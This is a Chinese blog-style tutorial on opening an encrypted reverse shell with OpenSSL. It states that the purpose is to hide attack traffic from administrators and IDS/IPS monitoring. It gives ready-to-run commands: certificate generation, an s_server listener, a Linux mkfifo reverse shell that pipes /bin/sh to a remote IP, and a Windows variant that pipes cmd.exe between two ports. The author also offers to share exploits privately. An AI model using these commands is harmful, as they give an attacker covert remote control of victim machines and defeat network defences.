openssl命令_使用OpenSsl加密反弹shell

一、实际环境:

当我们使用nc等工具进行反弹shell时,流量都是没经过加密,直接传输的,管理员很容易就能发现我们的异常流量,而且现在大部分企业内部都会有各种流量监测设备,所以在这种情况下当我们进行操作时,网络防御检测系统(IDS、IPS等)会获取到我们的通信内容并进行告警和阻止,因此需要对通信内容进行混淆或加密,这时可以选择使用 OpenSSL 反弹一个加密 shell。

OpenSSL 简介:

在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份

二、实验过程:

1、首先生成自签名证书,输入的时候默认回车即可:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

d5aadff949f2fa25147ef46edac128c5.png

2、服务端监听888端口:

openssl s_server -quiet -key key.pem -cert cert.pem -port 888

0301acb6bac3d0b71789827272da73d0.png

①Linux下使用mkfifo进行反弹shell:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.136.144:888 > /tmp/s; rm /tmp/s

7287de99647e5cddddb272599e01d3f8.png

成功反弹shell:

8d5e692c3f18110ffbc9fbd2734959ab.png

②Windows下反弹shell:

1、服务端要开启两个监听,因为以上命令会从 ip:port1 获取命令发送给 cmd.exe执行,然后把结果返回到 ip:port2,因此在本机需要启动两个 s_server

openssl s_server -quiet -key key.pem -cert cert.pem -port 888
openssl s_server -quiet -key key.pem -cert cert.pem -port 887

4b05608531238735f5ce4c22f239da30.png

2、Windows下执行命令:

openssl s_client -quiet -connect 192.168.136.144:888 | cmd.exe | openssl s_client -quiet -connect 192.168.136.144:887

249938f0687da8586786801bf13fcfbe.png

在服务端的888的窗口发送命令:

6f6a93578bef2c67141a0a90d4e6def6.png

然后服务端887的窗口就能收到执行结果:

c67fb32f0b87b5f929031b5f2cfb9668.png

PS:经过测试,发送完命令后,等待好久都没结果回来,但是在windows上敲一下空格或者回车等操作,结果不一会就回来了

传输过程都是经过加密的,可以使用wireshark抓包分析一下

各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935

备注:公众号+师傅们的id吧

6712eecf6b5e95b28d0a8f3b400bfd5f.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值